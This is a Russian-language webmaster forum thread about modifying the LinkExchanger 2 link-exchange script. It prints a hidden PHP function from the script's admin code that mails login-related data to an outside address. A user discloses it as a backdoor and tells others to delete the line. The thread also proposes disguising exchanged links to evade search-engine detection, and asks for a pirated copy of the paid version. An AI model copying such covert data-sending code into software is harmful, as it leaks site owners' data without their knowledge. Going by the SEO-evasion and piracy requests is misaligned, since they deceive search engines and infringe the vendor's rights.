Доработка скрипта обмена ссылками LinkExchanger 2

Статус
В этой теме нельзя размещать новые ответы.

FOX555

Постоялец
Регистрация
29 Авг 2007
Сообщения
78
Реакции
3
Поскольку автор похоже отошел от дел и выставил свой проект на продажу, все мои попытки связаться с ним потерпели неудачу... предлагаю заинтересованным товарищам сделать доработку данного скрипта своими силами.
Я погуглил и пришел к вводу что данный скрипт является наиболее функциональным на данный момент из всех платных и шаровых что есть.

Единственное что меня в нем не устроило так это то что он без проблем палится поисковиком на сайте и поэтому весь сайт или папка с скриптом как правило банятся.

Я предлагаю доработать этот скрипт таким образом что поисковики не смогут вычислить его на сайте.
Для этого в него встраивается модуль на подобие мини-SAPE то есть ссылки на сайты партнеров будут выводится не в отдельном разделе сайта а на внутренних станицах сайта как обычные ссылки. То есть использовать принцип какой юзает SAPE.
Кто готов финансово или своим трудом поучаствовать в этом проекте пишите в ветке.
 
гдето читал что в этом скрипте стоит стучалка которая отправляет пароли разработчикук а потому походу он сам массово добавляет во все кталоги с его скриптом ссылки.... так что смотри осторожней... поищи эту инфу....

п.с. я просто давно читал и немогу сейчас вспомнить точно где.
 
гдето читал что в этом скрипте стоит стучалка которая отправляет пароли разработчикук а потому походу он сам массово добавляет во все кталоги с его скриптом ссылки.... так что смотри осторожней... поищи эту инфу....

п.с. я просто давно читал и немогу сейчас вспомнить точно где.
В файле \linkexchanger\admin\functions\main.php в самом конце вот такой код:
function sendm($host, $msg1, $msg12)
{
$subject = "add link";
$message = "$host, $msg1, $msg12";
$headers = "Name: администратор \n";
$headers .= "From: admin_email@mail.ru \n";
$headers .= "Content-type: text/plain; charset=windows-1251 \r\n";
@mail("werto@ngs.ru", $subject, $message, $headers);
}
?>
Как то поставил его на локалхост, и просматривая заглушку для мэйлов обнаружил что при каждом входе в админку он отсылает мэйл.

Вообщем надо удалить строчку
@mail("werto@ngs.ru", $subject, $message, $headers);
Больше ничего не меняйте, а то в админку пускать не будет.,
***********
 
Единственное что меня в нем не устроило так это то что он без проблем палится поисковиком на сайте и поэтому весь сайт или папка с скриптом как правило банятся.
А как он палится?
 
У меня скрипт с некоторых пор, начал при попытке в разделе модерации посмотреть новые ссылки, просто перекидывает на сайт производителя. А там просят денег естественно.
Кто подскажет, что именно в этом файле хранится -
скрипт/admin/data/moder.dat
 
Народ у кого есть наиболее последняя (платная) версия linkexchanger2, поделитесь пожалуйста.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху